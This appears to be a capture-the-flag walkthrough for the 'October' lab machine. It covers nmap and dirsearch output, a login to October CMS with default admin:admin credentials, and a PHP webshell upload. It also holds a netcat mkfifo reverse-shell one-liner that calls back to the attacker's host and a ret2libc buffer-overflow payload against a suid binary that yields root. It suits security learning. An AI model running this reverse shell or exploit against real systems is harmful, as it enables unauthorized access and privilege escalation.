Getting Root:
The box is running October CMS and we can login using admin:admin
Navigating to /backend/cms/media
allows us to upload php files and we can get a reverse shell
Enumerating the box shows an interesting executable with the suid bit which is vulnerable to buffer overflow
Tools Used:
nmap, dirsearch.py, nc, gdb (with the peda extension)
Nmap
Copy # nmap -sC -sV -p- -oA nmap/October 10.10.10.16
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 23:54 EDT
Nmap scan report for 10.10.10.16
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
|_ 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.61 seconds
Enumeration
Dirsearch.py
Copy sudo /opt/dirsearch/dirsearch.py -u http://10.10.10.16 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -E
[sudo] password for kali:
_|. _ _ _ _ _ _|_ v0.3.9
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 30 | Wordlist size: 220521
Error Log: /opt/dirsearch/logs/errors-20-04-01_23-58-08.log
Target: http://10.10.10.16
[23:58:08] Starting:
[23:58:10] 200 - 5KB - /
[23:58:21] 200 - 4KB - /blog
[23:58:32] 301 - 310B - /themes -> http://10.10.10.16/themes/
[23:58:33] 200 - 9KB - /forum
[23:58:37] 301 - 311B - /modules -> http://10.10.10.16/modules/
[23:59:52] 200 - 5KB - /account
[00:00:08] 301 - 309B - /tests -> http://10.10.10.16/tests/
[00:00:10] 301 - 311B - /storage -> http://10.10.10.16/storage/
[00:00:18] 301 - 311B - /plugins -> http://10.10.10.16/plugins/
[00:01:30] 302 - 400B - /backend -> http://10.10.10.16/backend/backend/auth
[00:02:42] 200 - 4KB - /Blog
[00:04:38] 301 - 310B - /vendor -> http://10.10.10.16/vendor/
[00:04:40] 301 - 310B - /config -> http://10.10.10.16/config/
[00:08:45] 200 - 9KB - /Forum
[00:10:14] 200 - 3KB - /error
Navigating to /backend
redirect us to http://10.10.10.16/backend/backend/auth
We can login with admin:admin
and the application allows us to upload php files. I uploaded a webshell and was able to get a shell.
By clicking on the hyperlink, the application open the location of the webshell in anew tab.
Now we can get a reverse shell using netcat .
Exploitation
Copy # I tried with the -e but it failed, so I used the workaround
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
# On my Kali box
rlwrap nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.16.
Ncat: Connection from 10.10.10.16:40314.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
Privilege Escalation
There is binary with the suid set /usr/local/bin/ovrflw
Copy www-data@october:/$ find / -type f -perm -4000 -ls 2>/dev/null
find / -type f -perm -4000 -ls 2>/dev/null
267491 68 -rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
262216 40 -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
266648 32 -rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
262222 36 -rwsr-xr-x 1 root root 35300 May 17 2017 /bin/su
262217 44 -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
267489 88 -rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
928759 8 -rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
1053687 484 -rwsr-xr-x 1 root root 492972 Aug 11 2016 /usr/lib/openssh/ssh-keysign
931266 12 -rwsr-xr-x 1 root root 9808 Nov 24 2015 /usr/lib/policykit-1/polkit-agent-helper-1
395450 328 -rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
917774 156 -rwsr-xr-x 1 root root 156708 Oct 14 2016 /usr/bin/sudo
922948 32 -rwsr-xr-x 1 root root 30984 May 17 2017 /usr/bin/newgrp
931257 20 -rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
922277 48 -rwsr-xr-x 1 root root 45420 May 17 2017 /usr/bin/passwd
922274 44 -rwsr-xr-x 1 root root 44620 May 17 2017 /usr/bin/chfn
921702 68 -rwsr-xr-x 1 root root 66284 May 17 2017 /usr/bin/gpasswd
930650 20 -rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
930677 72 -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
921701 36 -rwsr-xr-x 1 root root 35916 May 17 2017 /usr/bin/chsh
930939 48 -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
930733 316 -rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
928820 20 -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
664031 8 -rwsr-xr-x 1 root root 7377 Apr 21 2017 /usr/local/bin/ovrflw
Let's try to see if we can exploit this binary by overriding EIP
by sending a unique pattern and finding the offset using gdb
with peda
extension.
Creating a unique pattern of 500 bytes using pattern_create 500
We noticed EIP got overridden by pattern 'AA8A
'
Finding the offset using pattern_offset AA8A
we can see the offset is 112
Finding the address of libc
Copy www-data@october:/usr/local/bin$ ldd /usr/local/bin/ovrflw | grep libc
ldd /usr/local/bin/ovrflw | grep libc
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7610000)
libc.so.6: b7610000
Finding the offset the system , exit and /bin/sh
Copy www-data@october:/usr/local/bin$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -e " system@" -e " exit@"
<-linux-gnu/libc.so.6 | grep -e " system@" -e " exit@"
139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/"
</bin$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/"
162bac /bin/sh
system: b7650310 (b7610000 + 40310)
exit: b7643260 (b7610000 + 33260)
/bin/sh: b7772bac (b7610000 + 162bac)
Converting them to little endian, we have:
system: \x10\x03\x65\xb7
exit: \x60\x32\x64\xb7
/bin/sh: \xac\x2b\x77\xb7
Therefore we can try to execute the exploit as follows:
Copy while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x03\x65\xb7" + "\x60\x32\x64\xb7" + "\xac\x2b\x77\xb7"'); done
Root
Copy www-data@october:/$ while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + "\x10\x03\x65\xb7" + "\x60\x32\x64\xb7" + "\xac\x2b\x77\xb7"'); done
<7" + "\x60\x32\x64\xb7" + "\xac\x2b\x77\xb7"'); done
*** Error in `/usr/local/bin/ovrflw': munmap_chunk(): invalid pointer: 0xbf946e8a ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Trace/breakpoint trap (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
*** Error in `/usr/local/bin/ovrflw': free(): invalid pointer: 0x08048380 ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Illegal instruction (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
*** Error in `/usr/local/bin/ovrflw': munmap_chunk(): invalid pointer: 0xbfb07e8a ***
Aborted (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=0(root),33(www-data)